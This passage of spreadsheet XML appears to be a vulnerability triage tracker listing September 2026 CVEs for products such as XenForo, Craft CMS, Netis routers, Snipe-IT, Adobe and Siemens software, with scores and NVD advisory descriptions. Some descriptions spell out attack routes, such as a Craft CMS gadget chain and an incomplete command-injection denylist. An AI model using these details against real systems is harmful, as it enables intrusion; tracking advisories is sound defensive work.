      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in hawtio-operator. When deploying Hawtio in cluster mode, the operator creates a cluster-scoped OAuthClient with automatic grant approval (GrantMethod: auto) and no client secret (public client). The redirect URIs are derived from the operator-created Route, whose hostname is tenant-controlled via the Hawtio CR spec.routeHostName field. A malicious tenant can register an arbitrary hostname as a valid OAuth redirect target and, because grants are auto-approved, obtain OpenShift access tokens of any cluster user who visits the crafted authorization URL without any consent prompt.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K277" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86727</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an information disclosure vulnerability in plugin/Live/stats.json.php that allows unauthenticated attackers to retrieve stream keys and m3u8 URLs by accessing the endpoint without authentication. Attackers can enumerate private, unlisted, and group-restricted live streams by parsing the hidden_applications array in the JSON response to obtain sensitive streaming credentials.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86732</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 contain a remote code execution vulnerability in the element-index endpoint that allows authenticated content editors to instantiate arbitrary classes through the criteria parameter. Attackers can inject a malicious class via criteria[withTransforms][0][class] that reaches ImageTransforms::normalizeTransform(), then use a PHP gadget chain with yii\rbac\PhpManager to execute code by pointing itemFile to a request log containing PHP payload in the User-Agent header.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86738</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34223</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61517</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an OS command injection vulnerability in the ping diagnostic handler that allows authenticated administrators to execute arbitrary shell commands as root by injecting into the IpAddr parameter. The parameter is interpolated directly into a shell command executed through system() with an incomplete denylist that only blocks spaces, pipes, semicolons, and ampersands, leaving command substitution and alternate field separator expansion available for exploitation.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75990</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Incorrect Authorization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T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75991</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Improper Input Validation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T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76190</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
